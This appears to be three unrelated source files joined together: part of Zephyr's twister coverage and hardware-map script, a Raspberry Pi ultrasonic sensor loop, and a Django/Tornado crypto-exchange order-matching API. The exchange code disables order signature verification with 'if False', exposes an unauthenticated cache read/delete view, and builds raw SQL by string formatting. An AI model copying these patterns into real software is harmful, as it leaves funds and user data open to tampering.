Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
threading_while_scanning.py
|
import RPi.GPIO as GPIO
import time
from threading import Thread
distances = []
TRIG = 24
ECHO = 26
GPIO.setmode(GPIO.BOARD)
GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup
GPIO.setup(ECHO, GPIO.IN) # echo input setup
GPIO.output(TRIG, False)
distances = []
def scan_for_obstacles():
GPIO.setmode(GPIO.BOARD)
while True:
GPIO.setmode(GPIO.BOARD)
# tells the sensor to fire a burst of sound
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
while GPIO.input(ECHO) == 0:
pass
startTime = time.time()
while GPIO.input(ECHO) == 1:
pass
stopTime = time.time()
distance = (stopTime-startTime) * 17000
distances.append(distance)
time.sleep(0.025)
def move():
dist = distances[-1]
if dist <= 10:
print 'uh oh a-somebody toucha mah spagheett'
def Main():
try:
t1 = Thread(target = scan_for_obstacles)
t1.start()
t2 = Thread(target=move)
t2.start()
t2.join()
print distances
except KeyboardInterrupt:
# shut down cleanly
GPIO.cleanup()
if __name__ == '__main__':
Main()
|
api.py
|
# -*- coding: utf-8 -*-
import json
from decimal import Decimal, getcontext
import logging
import traceback
import calendar
import time
import tornado.ioloop
# from tornaduv import UVLoop
import sys
import Queue
import copy
import tornado.web
# import tornaduv
# import pyuv
import threading
# Create your views here.
from django.template import Context, loader
from crypton.http import HttpResponse
from crypton import settings
from django.utils.translation import ugettext as _
from django.utils import formats
from django.db import connection
from django.contrib.auth.models import User
from main.models import UserCustomSettings, VolatileConsts, OrdersMem, Accounts, TradePairs, Orders, Trans, Currency, \
Msg, add_trans, TransError, StockStat, OnlineUsers
from main.api_http_common import caching, cached_json_object, my_cache, status_false, json_auth_required, check_api_sign
from main.api_http_common import format_numbers10, format_numbers_strong, format_numbers, format_numbers4, \
json_false500, json_true
from datetime import datetime, timedelta
from main.account import get_account
logger_application = logging.getLogger('tornado.application')
from main.models import dictfetchall, to_prec, OrderTimer, add_trans2, DealsMemory
from main.msgs import system_notify
from main.my_cache_key import my_lock, LockBusyException, check_freq, my_release
from crypton.http import MemStore
from main.tornado.api_queue import process_delayed_operation
class TornadoServer(object):
# статический экземпляр этого класса, всегда один
# доступ к нему только через TornadoServer.get_instance()
_instance = None
@classmethod
def get_instance(cls):
"""
Возвращает экземпляр ядра, если оно создано.
:rtype : Core
"""
if not cls._instance:
raise RuntimeError('core is not created')
return cls._instance
@classmethod
def is_created(cls):
"""
Создано ли ядро?
:rtype : bool
"""
return cls._instance is not None
@classmethod
def create_instance(cls, *args):
"""
Создаёт и возвращает объект
:rtype : Core
"""
logger_application.info('creatpring tornado instance')
cls._instance = TornadoServer(*args)
logger_application.info('core created: {0}'.format(cls._instance))
return cls._instance
def __init__(self, *args):
self.port = args[0]
self.application = tornado.web.Application(args[1])
self.queue_enabled = args[2]
# self.core_event_loop = pyuv.Loop.default_loop()
self.memstore = MemStore.create_instance(is_local=False)
SizeQueue = 5000
SubscribeCountRead = 100
self.queue1 = Queue.Queue(SizeQueue)
self.task_archive = tornado.ioloop.PeriodicCallback( lambda: processed_orders2deals(), 1000*20)
self.task_memtrans2trans = tornado.ioloop.PeriodicCallback( lambda: process_queue(self.queue1, SubscribeCountRead, process_delayed_operation), 500)
# tornado.ioloop.IOLoop.configure(UVLoop)
# tornado.ioloop.IOLoop.current().initialize(self.core_event_loop)
# start eventloop, webserver and periodic reading
def start(self):
self.application.listen(self.port)
if self.queue_enabled:
self.task_archive.start()
self.task_memtrans2trans.start()
self.main_loop = tornado.ioloop.IOLoop.instance()
self.main_loop.start()
def put2queue(some_object):
backend = TornadoServer.get_instance()
try:
backend.queue1.put(copy.deepcopy(some_object), False)
return True
except Queue.Full:
logger_application.error("="*60)
logger_application.error("WARNING")
logger_application.error("so sad there is not avalible slot")
return False
except:
logger_application.critical(traceback.format_exc())
class StopHandler(tornado.web.RequestHandler):
def get(self):
logger_application.info("stoping tornado")
tornado.ioloop.IOLoop.instance().stop()
# user_id = models.IntegerField()
# type_deal = models.CharField(max_length=40, choices=TYPE, default='buy', verbose_name=u"Тип")
# user = models.CharField(max_length=255, verbose_name=u"Username")
# price = models.DecimalField(max_digits=20,
# blank=True,
# decimal_places=10, verbose_name=u"цена")
#decimal_places=10, verbose_name=u"сумма в базовой валюте")
#amnt_trade = models.DecimalField(max_digits=20,
#blank=True,
#decimal_places=10, verbose_name=u
#amnt_base = models.DecimalField(max_digits=20,
#blank=True,"сумма в валюты торга")
#pub_date = models.DateTimeField(auto_now=True, verbose_name=u"Дата ")
#trade_pair = models.IntegerField(verbose_name=u"Валютная пара")
# transaction from the deals to
def cache_control(Req):
do = Req.REQUEST.get("do", None)
cache = caching()
if do == "flush":
return json_false500(Req)
if do == "get":
key = Req.REQUEST.get("key")
return HttpResponse(str(cache.get(key,"")))
if do == "del":
key = Req.REQUEST.get("key")
value = str(cache.get(key,""))
cache.delete(key)
return HttpResponse(value)
return json_false500(Req)
def canceled_orders2deals(Order2Remove):
(amnt_base, amnt_trade) = (0, 0)
if (Order2Remove.sum1_history - Order2Remove.sum1)>0:
if Order2Remove.type_deal == "sell" :
amnt_base = (Order2Remove.sum1_history - Order2Remove.sum1 )* Order2Remove.price
amnt_trade = Order2Remove.sum1_history - Order2Remove.sum1
if Order2Remove.type_deal == "buy":
amnt_base = Order2Remove.sum1_history - Order2Remove.sum1
amnt_trade = (Order2Remove.sum1_history - Order2Remove.sum1)/Order2Remove.price
user = User.objects.get(id = Order2Remove.user)
deal = DealsMemory(type_deal = Order2Remove.type_deal,
user = user.username,
user_id = Order2Remove.user,
price = Order2Remove.price,
amnt_base = amnt_base,
amnt_trade = amnt_trade,
trade_pair = Order2Remove.trade_pair)
deal.save()
def processed_orders2deals():
logger_application.info("cache deals")
for item in OrdersMem.objects.filter(status="processed"):
(amnt_base, amnt_trade) = (0,0)
if item.type_deal == "sell" :
amnt_base = item.sum1_history * item.price
amnt_trade = item.sum1_history
if item.type_deal == "buy":
amnt_base = item.sum1_history
amnt_trade = item.sum1_history/item.price
if item.type_deal == "transfer":
item.archive()
continue
user = User.objects.get(id = item.user)
deal = DealsMemory(type_deal = item.type_deal,
user = user.username,
user_id = item.user,
price = item.price,
amnt_base = amnt_base,
amnt_trade = amnt_trade,
trade_pair = item.trade_pair)
deal.save()
item.archive()
item.delete()
def process_queue(q, read_count, function_to_process=None):
logger_application.info("process inner queue")
for i in xrange(1, read_count):
try:
item = q.get(False)
if function_to_process:
function_to_process(item)
q.task_done()
except Queue.Empty:
return True
except:
logger_application.critical("something wrong with process queue \n" + traceback.format_exc() )
def my_async(func2decorate):
def wrapper(*args, **kwards):
callable_object = lambda: func2decorate(*args, **kwards)
threading.Thread(target=callable_object).start()
return True
return wrapper
def deposit_funds(Order, currency1):
return _(u"Deposit funds %(sum)s %(currency)s according with order #%(order_id)i " % {
'sum': Order.sum1_history,
'currency': currency1.title,
'order_id': Order.id})
def order_canceled(Order):
return _(u"You order #%(order_id)i is canceled" % {'order_id': int(Order)})
def order_finish(Order):
return _(u"You order #%(order_id)i is fully completed" % {'order_id': Order.id})
def order_return_unused(Order, Currency1, AccumSumToSell):
return _(u"Return %(sum).8f %(currency)s unused funds according with order #%(order_id)i " %
{'sum': AccumSumToSell,
'currency': str(Currency1),
'order_id': Order.id})
def order_description_buy(Sum1, Sum2, Order, BackOrder, TradePair):
Price = BackOrder.price
return _("Buying %(sum).8f %(currency)s according with order #%(order_id)i, price %(price).8f total sum %(total).8f" %
{'sum': Sum1,
'currency': str(TradePair.currency_on),
'order_id': BackOrder.id,
'price': Price,
'total': Sum2
})
def order_description_sell(Sum1, Sum2, Order, BackOrder, TradePair):
Price = Order.price
return _("Selling %(sum).8f %(currency)s according with order #%(order_id)i, price %(price).8f total sum %(total).8f " %
{'sum': Sum1,
'currency': str(TradePair.currency_on),
'order_id': Order.id,
'price': Price,
'total': Sum2
})
# process order item that match order AccumSumToSell=>7000UAH AccountBuyer BTC Accountc
# OrderBuy order of buying BTC sum1 is for exmaple 1 BTC , OrderSell 7000UAH selling
# OrderSell - is a source order
# Account seller is a source account
def process_order_buy(AccountSeller, AccumSumToSell, OrderBuy, OrderSell, TradePair):
## TODO move to settings for every user
logger_application.info("="*120)
logger_application.info(OrderSell)
logger_application.info("="*120)
logger_application.info(AccountSeller)
logger_application.info("buy %s " % (AccumSumToSell))
logger_application.info(OrderBuy)
logger_application.info("="*120)
# TODO add salt verify, notify me
if False and not OrderBuy.verify(str(OrderBuy.user)):
logger_application.critical("Sign FAILED %s" % str(OrderBuy))
return AccumSumToSell
# OrderBuy.sum1*OrderBuy.price
# 1.9 *7000 = 13000 UAH
# OrderBuySum UAH for BTC
OrderBuySum = OrderBuy.sum1*OrderBuy.price
if OrderBuySum > AccumSumToSell:
logger_application.info("buy case 1")
## a danger of low overflow
TransSum = AccumSumToSell/OrderBuy.price
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
AccumSumToSell*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderBuy.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderSell.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderBuy))
put2queue(('deal', trans2, TradePair, OrderSell))
system_notify_async(order_description_sell(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountBuyer.get_user())
system_notify_async(order_description_buy(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountSeller.get_user())
except:
logger_application.critical("something gooing wrong with notification" + traceback.format_exc())
pass
return 0
if OrderBuySum <= AccumSumToSell:
logger_application.info("buy case 2")
TransSum = OrderBuy.sum1
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
OrderBuySum*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderBuy.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderSell.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderBuy))
put2queue(('deal', trans2, TradePair, OrderSell))
system_notify_async(order_description_sell(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountBuyer.get_user())
system_notify_async(order_description_buy(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountSeller.get_user())
system_notify_async(order_finish(OrderBuy), AccountBuyer.get_user())
except:
logger_application.critical("somthing gooing wrong with notification" + traceback.format_exc())
pass
OrderBuy.make2processed()
return AccumSumToSell-OrderBuySum
# process order item that match order Order AccumSumToSell=>1BTC AccountSeller UAH Accounts
# OrderBuy order of buying BTC sum1 is for exmaple 7000 UAH , OrderSell 1 BTC selling
def process_order_sell(AccountSeller, AccumSumToSell, OrderBuy, OrderSell, TradePair):
## TODO move to settings for every user
logger_application.info("=========================================================================================")
logger_application.info(OrderSell)
logger_application.info(AccountSeller)
logger_application.info("sell %s" % (AccumSumToSell))
logger_application.info(OrderBuy)
logger_application.info("=========================================================================================")
# TODO add salt verify, notify me
if False and not OrderBuy.verify(str(OrderBuy.user)):
logger_application.info("Sign FAILED %s" % str(OrderBuy))
return AccumSumToSell
# 7000/3600 = 1.9 BTC
OrderBuySum = OrderBuy.sum1/OrderSell.price
if OrderBuySum > AccumSumToSell:
## a danger of low overflow
logger_application.info("sell case 1")
TransSum = AccumSumToSell*OrderSell.price
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
AccumSumToSell*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderBuy.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderSell.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderSell))
put2queue(('deal', trans2, TradePair, OrderBuy))
system_notify_async(order_description_sell(AccumSumToSell, TransSum, OrderSell, OrderBuy, TradePair),
AccountSeller.get_user())
system_notify_async(order_description_buy(AccumSumToSell, TransSum, OrderSell, OrderBuy, TradePair),
AccountBuyer.get_user())
except:
logger_application.critical("something gooing wrong with notification" + traceback.format_exc())
pass
return 0
if OrderBuySum <= AccumSumToSell:
logger_application.info("sell case 2")
TransSum = OrderBuy.sum1
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
OrderBuySum*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderSell.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderBuy.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderSell))
put2queue(('deal', trans2, TradePair, OrderBuy))
system_notify_async(order_description_sell(OrderBuySum, TransSum, OrderSell, OrderBuy, TradePair), AccountSeller.get_user())
system_notify_async(order_description_buy(OrderBuySum, TransSum, OrderSell, OrderBuy, TradePair), AccountBuyer.get_user())
system_notify_async(order_finish(OrderBuy), AccountBuyer.get_user())
except:
logger_application.critical("somthing gooing wrong with notification" + traceback.format_exc())
pass
OrderBuy.make2processed()
return AccumSumToSell - OrderBuySum
def admin_system_notify_async(cortage):
pass
def auth(Req):
Nonce = Req.REQUEST.get("nonce", None)
if Nonce is None:
return json_false500(Req)
Sign = Req.META.get('HTTP_API_SIGN', None)
if Sign is None:
return json_false500(Req, {"description": "invalid_params", "key": "api_sign"})
PublicKey = Req.META.get('HTTP_PUBLIC_KEY', None)
if PublicKey is None:
return json_false500(Req, {"description": "invalid_params", "key": "public_key"})
try:
Req.user = check_api_sign(PublicKey, Sign, Req.body)
Cache = caching()
Cache.set("nonce_" + PublicKey, int(Nonce), 50000)
Nonce = Cache.get("nonce_" + PublicKey)
return json_true(Req, {"nonce": Nonce, "public_key": PublicKey})
except:
logger_application.critical(traceback.format_exc())
return json_false500(Req, {"description": "auth_faild"})
def make_auto_trade(OrderSell, TradePair, Price, Currency1, Sum1, Currency2):
# if we sell
# Query = "SELECT * FROM main_ordersmem WHERE trade_pair_id=%i" % (TradePair.id)
logger_application.info("="*300)
logger_application.info("call order")
logger_application.info(OrderSell)
if int(TradePair.currency_on.id) == int(Currency1.id):
Query = "SELECT * FROM main_ordersmem WHERE currency1=%i AND trade_pair=%i \
AND status='processing' AND price >= %s \
AND user!=%i ORDER BY price DESC, id DESC" % (Currency2.id,
TradePair.id,
format_numbers_strong(Price), OrderSell.user)
else:
Query = "SELECT * FROM main_ordersmem WHERE currency1=%i AND trade_pair=%i \
AND status='processing' AND price <= %s \
AND user!=%i ORDER BY price, id DESC " % (Currency2.id,
TradePair.id,
format_numbers_strong(Price), OrderSell.user )
List = OrdersMem.objects.raw(Query)
# ##work on first case
AccumSumToSell = Sum1
AccountBuyer = get_account(user_id=OrderSell.user, currency_id=Currency2.id)
UserDeals = [int(OrderSell.user)]
process_order = None
if TradePair.currency_on.id == Currency1.id :
process_order = lambda AccountBuyer, AccumSumToSell, OrderBuy, OrderSell, TradePair: process_order_sell(AccountBuyer, AccumSumToSell, OrderBuy, OrderSell, TradePair)
else:
process_order = lambda AccountBuyer, AccumSumToSell, OrderBuy, OrderSell, TradePair: process_order_buy(AccountBuyer, AccumSumToSell, OrderBuy, OrderSell, TradePair)
# TODO in case of exception block OrderSell and OrderBuy and interrupt the cycle
for OrderBuy in List:
UserDeals.append(int(OrderBuy.user))
try :
AccumSumToSell = process_order(AccountBuyer, AccumSumToSell, OrderBuy, OrderSell, TradePair)
except TransError as e:
logger_application.critical(traceback.format_exc())
OrderBuy.status = "core_error"
OrderSell.status = "core_error"
OrderBuy.save()
OrderSell.save()
admin_system_notify_async((OrderBuy, OrderSell))
ResultSum = finish_create_order(TradePair, AccumSumToSell, OrderSell)
return {"start_sum": Sum1, "status":False, "last_sum": ResultSum, "users_bothered": UserDeals}
if AccumSumToSell > 0.00000001:
continue
else:
break
logger_application.info("="*300)
logger_application.info(AccumSumToSell)
ResultSum = finish_create_order(TradePair, AccumSumToSell, OrderSell)
OrderSell.sum1 = AccumSumToSell
# comission operation
if ResultSum < 0.00000001 and ResultSum>=0:
#if ResultSum != 0:
# return_rest2acc(OrderSell, AccumSumToSell, Currency1)
OrderSell.sum1 = 0
OrderSell.make2processed()
else:
OrderSell.save()
return {"start_sum": Sum1, "status":True, "last_sum": ResultSum, "users_bothered": UserDeals}
@my_async
def system_notify_async(Msg, User):
system_notify(Msg, User)
def finish_create_order(TradePair, AccumSumToSell, Order):
##base currency
if Order.currency1 == TradePair.currency_on.id:
if AccumSumToSell < TradePair.min_trade_base:
system_notify_async(order_finish(Order), Order.user)
return 0
else:
return AccumSumToSell
else:
SumToBuy = AccumSumToSell/Order.price
if SumToBuy < TradePair.min_trade_base:
system_notify_async(order_finish(Order), Order.user)
return 0
else:
return AccumSumToSell
@my_async
def reload_cache(Res, Type):
cache = caching()
DeleteKeys = []
for i in Res["users_bothered"]:
CachedKey1 = 'client_orders_' + str(i) + "_" + Type
CachedKey2 = 'balance_' + str(i)
DeleteKeys.append(CachedKey1)
DeleteKeys.append(CachedKey2)
# deal_list_btc_uah
DeleteKeys.append("sell_list_" + Type)
DeleteKeys.append("buy_list_" + Type)
logger_application.info("delete this keys %s " % str(DeleteKeys))
cache.delete_many(DeleteKeys)
def process_auto(Res, TradePair, Dict = None):
Encoder = json.JSONEncoder()
if Res["status"]:
if Res["start_sum"] == Res["last_sum"]:
Dict = {"status": True, "description": _("The order has been created")}
elif Res["last_sum"] == 0:
Dict = {"status": "processed",
"description": _("Your order has been fully processed successfully"),
"start_sum_to_buy": str(Res["start_sum"]),
"last_sum_to_buy": str(Res["last_sum"])
}
elif Res["start_sum"] > Res["last_sum"]:
Dict = {"status": "processed", "description": _("Your order has been processed partial"),
"start_sum_to_buy": str(Res["start_sum"]),
"last_sum_to_buy": str(Res["last_sum"])
}
else:
Dict = {"status": "process_order_error", "description": _("The mistake has been occurred during"
" creation of the order,"
" and developers were notified about it")}
Type = TradePair.url_title
reload_cache(Res, Type)
return Encoder.encode(Dict)
def process_mistake(Req, Mistake):
Dict = None
Encoder = json.JSONEncoder()
